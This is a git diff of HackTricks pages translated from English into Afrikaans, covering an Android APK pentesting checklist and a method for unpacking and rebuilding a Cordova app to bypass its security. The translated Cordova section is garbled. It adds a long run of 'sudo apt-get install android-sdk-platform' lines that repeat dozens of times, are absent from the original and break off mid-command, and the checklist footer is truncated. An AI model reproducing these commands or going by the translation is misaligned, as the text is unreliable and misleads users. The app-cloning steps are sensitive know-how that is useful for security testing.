-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/mobile-pentesting/android-checklist.md b/mobile-pentesting/android-checklist.md index d6e559304..740ee1e8b 100644 --- a/mobile-pentesting/android-checklist.md +++ b/mobile-pentesting/android-checklist.md @@ -1,95 +1,83 @@ -# Android APK Checklist +# Android APK Kontrolelys
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals) +### [Leer Android-grondbeginsels](android-app-pentesting/#2-android-application-fundamentals) * [ ] [Basics](android-app-pentesting/#fundamentals-review) * [ ] [Dalvik & Smali](android-app-pentesting/#dalvik--smali) -* [ ] [Entry points](android-app-pentesting/#application-entry-points) - * [ ] [Activities](android-app-pentesting/#launcher-activity) - * [ ] [URL Schemes](android-app-pentesting/#url-schemes) - * [ ] [Content Providers](android-app-pentesting/#services) - * [ ] [Services](android-app-pentesting/#services-1) - * [ ] [Broadcast Receivers](android-app-pentesting/#broadcast-receivers) - * [ ] [Intents](android-app-pentesting/#intents) - * [ ] [Intent Filter](android-app-pentesting/#intent-filter) -* [ ] [Other components](android-app-pentesting/#other-app-components) -* [ ] [How to use ADB](android-app-pentesting/#adb-android-debug-bridge) -* [ ] [How to modify Smali](android-app-pentesting/#smali) +* [ ] [Toegangspunte](android-app-pentesting/#application-entry-points) +* [ ] [Aktiwiteite](android-app-pentesting/#launcher-activity) +* [ ] [URL-skemas](android-app-pentesting/#url-schemes) +* [ ] [Inhoudsverskaffers](android-app-pentesting/#services) +* [ ] [Dienste](android-app-pentesting/#services-1) +* [ ] [Uitsaai-ontvangers](android-app-pentesting/#broadcast-receivers) +* [ ] [Intents](android-app-pentesting/#intents) +* [ ] [Intent-filter](android-app-pentesting/#intent-filter) +* [ ] [Ander komponente](android-app-pentesting/#other-app-components) +* [ ] [Hoe om ADB te gebruik](android-app-pentesting/#adb-android-debug-bridge) +* [ ] [Hoe om Smali te wysig](android-app-pentesting/#smali) -### [Static Analysis](android-app-pentesting/#static-analysis) +### [Statiese Analise](android-app-pentesting/#static-analysis) -* [ ] Check for the use of [obfuscation](android-checklist.md#some-obfuscation-deobfuscation-information), checks for noting if the mobile was rooted, if an emulator is being used and anti-tampering checks. [Read this for more info](android-app-pentesting/#other-checks). -* [ ] Sensitive applications (like bank apps) should check if the mobile is rooted and should actuate in consequence. -* [ ] Search for [interesting strings](android-app-pentesting/#looking-for-interesting-info) (passwords, URLs, API, encryption, backdoors, tokens, Bluetooth uuids...). - * [ ] Special attention to [firebase ](android-app-pentesting/#firebase)APIs. -* [ ] [Read the manifest:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml) - * [ ] Check if the application is in debug mode and try to "exploit" it - * [ ] Check if the APK allows backups - * [ ] Exported Activities - * [ ] Content Providers - * [ ] Exposed services - * [ ] Broadcast Receivers - * [ ] URL Schemes -* [ ] Is the application s[aving data insecurely internally or externally](android-app-pentesting/#insecure-data-storage)? -* [ ] Is there any [password hard coded or saved in disk](android-app-pentesting/#poorkeymanagementprocesses)? Is the app [using insecurely crypto algorithms](android-app-pentesting/#useofinsecureandordeprecatedalgorithms)? -* [ ] All the libraries compiled using the PIE flag? -* [ ] Don't forget that there is a bunch of[ static Android Analyzers](android-app-pentesting/#automatic-analysis) that can help you a lot during this phase. +* [ ] Kyk vir die gebruik van [obfuskasie](android-checklist.md#some-obfuscation-deobfuscation-information), kyk of die foon gewortel is, of 'n emulator gebruik word en anti-manipulasie kontroles. [Lees hierdie vir meer inligting](android-app-pentesting/#other-checks). +* [ ] Sensitiewe toepassings (soos banktoepassings) moet kyk of die foon gewortel is en dienooreenkomstig optree. +* [ ] Soek na [interessante strings](android-app-pentesting/#looking-for-interesting-info) (wagwoorde, URL's, API's, enkripsie, agterdeure, tokens, Bluetooth-UUID's...). +* [ ] Spesiale aandag aan [firebase](android-app-pentesting/#firebase)-API's. +* [ ] [Lees die manifest:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml) +* [ ] Kyk of die toepassing in foutopsporingsmodus is en probeer dit "uitbuit" +* [ ] Kyk of die APK rugsteun toelaat +* [ ] Uitgevoerde aktiwiteite +* [ ] Inhoudsverskaffers +* [ ] Blootgestelde dienste +* [ ] Uitsaai-ontvangers +* [ ] URL-skemas +* [ ] Stoor die toepassing data onveilig intern of ekstern op (android-app-pentesting/#insecure-data-storage)? +* [ ] Is daar enige wagwoord wat hardgekoded of op die skyf gestoor word (android-app-pentesting/#poorkeymanagementprocesses)? Gebruik die toepassing onveilige kriptografiese algoritmes (android-app-pentesting/#useofinsecureandordeprecatedalgorithms)? +* [ ] Is al die biblioteke gekompileer met die PIE-vlag? +* [ ] Moenie vergeet dat daar 'n klomp [statiese Android-analise-instrumente](android-app-pentesting/#automatic-analysis) is wat jou baie kan help gedurende hierdie fase. -### [Dynamic Analysis](android-app-pentesting/#dynamic-analysis) +### [Dinamiese Analise](android-app-pentesting/#dynamic-analysis) -* [ ] Prepare the environment ([online](android-app-pentesting/#online-dynamic-analysis), [local VM or physical](android-app-pentesting/#local-dynamic-analysis)) -* [ ] Is there any [unintended data leakage](android-app-pentesting/#unintended-data-leakage) (logging, copy/paste, crash logs)? -* [ ] [Confidential information being saved in SQLite dbs](android-app-pentesting/#sqlite-dbs)? -* [ ] [Exploitable exposed Activities](android-app-pentesting/#exploiting-exported-activities-authorisation-bypass)? -* [ ] [Exploitable Content Providers](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)? -* [ ] [Exploitable exposed Services](android-app-pentesting/#exploiting-services)? -* [ ] [Exploitable Broadcast Receivers](android-app-pentesting/#exploiting-broadcast-receivers)? -* [ ] Is the application [transmitting information in clear text/using weak algorithms](android-app-pentesting/#insufficient-transport-layer-protection)? is a MitM possible? -* [ ] [Inspect HTTP/HTTPS traffic](android-app-pentesting/#inspecting-http-traffic) - * [ ] This one is really important, because if you can capture the HTTP traffic you can search for common Web vulnerabilities (Hacktricks has a lot of information about Web vulns). -* [ ] Check for possible [Android Client Side Injections](android-app-pentesting/#android-client-side-injections-and-others) (probably some static code analysis will help here) -* [ ] [Frida](android-app-pentesting/#frida): Just Frida, use it to obtain interesting dynamic data from the application (maybe some passwords...) +* [ ] Berei die omgewing voor ([aanlyn](android-app-pentesting/#online-dynamic-analysis), [plaaslike VM of fisiese](android-app-pentesting/#local-dynamic-analysis)) +* [ ] Is daar enige [onbedoelde datalek](android-app-pentesting/#unintended-data-leakage) (logboeke, kopieer/plak, foutlogboeke)? +* [ ] [Vertroulike inligting wat in SQLite-databasisse gestoor word](android-app-pentesting/#sqlite-dbs)? +* [ ] [Uitbuitbare blootgestelde aktiwiteite](android-app-pentesting/#exploiting-exported-activities-authorisation-bypass)? +* [ ] [Uitbuitbare inhoudsverskaffers](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)? +* [ ] [Uitbuitbare blootgestelde dienste](android-app-pentesting/#exploiting-services)? +* [ ] [Uitbuitbare uitsaai-ontvangers](android-app-pentesting/#exploiting-broadcast-receivers)? +* [ ] Stuur die toepassing inligting in duidelike teks/maak gebruik van swak algoritmes (android-app-pentesting/#insufficient-transport-layer-protection)? Is 'n MitM-aanval moontlik? +* [ ] [Inspekteer HTTP/HTTPS-verkeer](android-app-pentesting/#inspecting-http-traffic) +* [ ] Hierdie een is baie belangrik, want as jy die HTTP-verkeer kan vasvang, kan jy soek na algemene webkwesbaarhede (Hacktricks het baie inligting oor webkwesbaarhede). +* [ ] Kyk vir moontlike [Android-kliëntkant-injeksies](android-app-pentesting/#android-client-side-injections-and-others) (waarskynlik sal sommige statiese kode-analise hier help) +* [ ] [Frida](android-app-pentesting/#frida): Net Frida, gebruik dit om interessante dinamiese data van die toepassing te verkry (miskien sommige wagwoorde...) -### Some obfuscation/Deobfuscation information +### Sommige obfuskasie/Deobfuskasie-inligting -* [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code) +* [ ] [Lees hier](android-app-pentesting/#obfuscating-deobfuscating-code)
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +Vind kw +* **Deel jou hacking truuks deur PRs in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
- diff --git a/mobile-pentesting/cordova-apps.md b/mobile-pentesting/cordova-apps.md index 539620b0b..676a8b350 100644 --- a/mobile-pentesting/cordova-apps.md +++ b/mobile-pentesting/cordova-apps.md @@ -1,87 +1,327 @@ -# Cordova Apps +# Cordova-toepassings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-**For further details check [https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58](https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58)**. This is a sumary: +**Vir verdere besonderhede, kyk na [https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58](https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58)**. Hier is 'n opsomming: -Apache Cordova is recognized for enabling the development of **hybrid applications** using **JavaScript, HTML, and CSS**. It allows the creation of Android and iOS applications; however, it lacks a default mechanism for securing the application's source code. In contrast to React Native, Cordova does not compile the source code by default, which can lead to code tampering vulnerabilities. Cordova utilizes WebView to render applications, exposing the HTML and JavaScript code even after being compiled into APK or IPA files. React Native, conversely, employs a JavaScript VM to execute JavaScript code, offering better source code protection. +Apache Cordova word erken vir die moontlikheid om **hibriede toepassings** te ontwikkel met behulp van **JavaScript, HTML en CSS**. Dit maak die skep van Android- en iOS-toepassings moontlik; egter, dit het nie 'n verstek meganisme vir die beveiliging van die toepassing se bronkode nie. In teenstelling met React Native, kompileer Cordova nie die bronkode standaard nie, wat kan lei tot kode-manipulasie kwesbaarhede. Cordova maak gebruik van WebView om toepassings te vertoon, wat die HTML- en JavaScript-kode blootstel selfs nadat dit in APK- of IPA-lêers gekompileer is. Aan die ander kant gebruik React Native 'n JavaScript VM om JavaScript-kode uit te voer, wat beter bronkodebeskerming bied. -### Cloning a Cordova Application +### Kloning van 'n Cordova-toepassing -Before cloning a Cordova application, ensure that NodeJS is installed along with other prerequisites like the Android SDK, Java JDK, and Gradle. The official Cordova [documentation](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) provides a comprehensive guide for these installations. +Voordat jy 'n Cordova-toepassing kloon, verseker dat NodeJS geïnstalleer is, tesame met ander vereistes soos die Android SDK, Java JDK en Gradle. Die amptelike Cordova [dokumentasie](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) bied 'n omvattende gids vir hierdie installasies. -Consider an example application named `Bank.apk` with the package name `com.android.bank`. To access the source code, unzip `bank.apk` and navigate to the `bank/assets/www` folder. This folder contains the complete source code of the application, including HTML and JS files. The application's configuration can be found in `bank/res/xml/config.xml`. - -To clone the application, follow these steps: +Neem byvoorbeeld 'n toepassing genaamd `Bank.apk` met die pakketsnaam `com.android.bank`. Om toegang tot die bronkode te verkry, pak `bank.apk` uit en navigeer na die `bank/assets/www`-map. Hierdie map bevat die volledige bronkode van die toepassing, insluitend HTML- en JS-lêers. Die konfigurasie van die toepassing kan gevind word in `bank/res/xml/config.xml`. +Volg hierdie stappe om die toepassing te kloon: ```bash npm install -g cordova@latest cordova create bank-new com.android.bank Bank cd bank-new ``` +Kopieer die inhoud van `bank/assets/www` na `bank-new/www`, met uitsluiting van `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, en die `plugins/` gids. -Copy the contents of `bank/assets/www` to `bank-new/www`, excluding `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, and the `plugins/` directory. +Spesifiseer die platform (Android of iOS) wanneer jy 'n nuwe Cordova projek skep. Voeg die Android platform by vir die kloning van 'n Android app. Let daarop dat Cordova se platform weergawes en Android API vlakke verskillend is. Raadpleeg die Cordova [dokumentasie](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) vir besonderhede oor platform weergawes en ondersteunde Android APIs. -Specify the platform (Android or iOS) when creating a new Cordova project. For cloning an Android app, add the Android platform. Note that Cordova's platform versions and Android API levels are distinct. Refer to the Cordova [documentation](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) for details on platform versions and supported Android APIs. - -To determine the appropriate Cordova Android platform version, check the `PLATFORM_VERSION_BUILD_LABEL` in the original application's `cordova.js` file. - -After setting up the platform, install the required plugins. The original application's `bank/assets/www/cordova_plugins.js` file lists all the plugins and their versions. Install each plugin individually as shown below: +Om die toepaslike Cordova Android platform weergawe te bepaal, kyk na die `PLATFORM_VERSION_BUILD_LABEL` in die oorspronklike toepassing se `cordova.js` lêer. +Nadat die platform opgestel is, installeer die vereiste plugins. Die oorspronklike toepassing se `bank/assets/www/cordova_plugins.js` lêer lys al die plugins en hul weergawes. Installeer elke plugin afsonderlik soos hieronder getoon: ```bash cd bank-new cordova plugin add cordova-plugin-dialogs@2.0.1 ``` - -If a plugin is not available on npm, it can be sourced from GitHub: - +As 'n invoegtoepassing nie beskikbaar is op npm nie, kan dit vanaf GitHub verkry word: ```bash cd bank-new cordova plugin add https://github.com/moderna/cordova-plugin-cache.git ``` +Maak seker dat al die voorvereistes voldoen word voordat jy begin kompileer: -Ensure all prerequisites are met before compiling: - +```bash +$ sudo apt-get install git wget curl unzip -y +$ sudo apt-get install openjdk-8-jdk -y +$ sudo apt-get install ant -y +$ sudo apt-get install gradle -y +$ sudo apt-get install android-sdk -y +$ sudo apt-get install android-sdk-build-tools -y +$ sudo apt-get install android-sdk-platform-tools -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-build-tools-23 -y +$ sudo apt-get install android-sdk-build-tools-25 -y +$ sudo apt-get install android-sdk-build-tools-26 -y +$ sudo apt-get install android-sdk-build-tools-27 -y +$ sudo apt-get install android-sdk-build-tools-28 -y +$ sudo apt-get install android-sdk-build-tools-29 -y +$ sudo apt-get install android-sdk-build-tools-30 -y +$ sudo apt-get install android-sdk-build-tools-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get 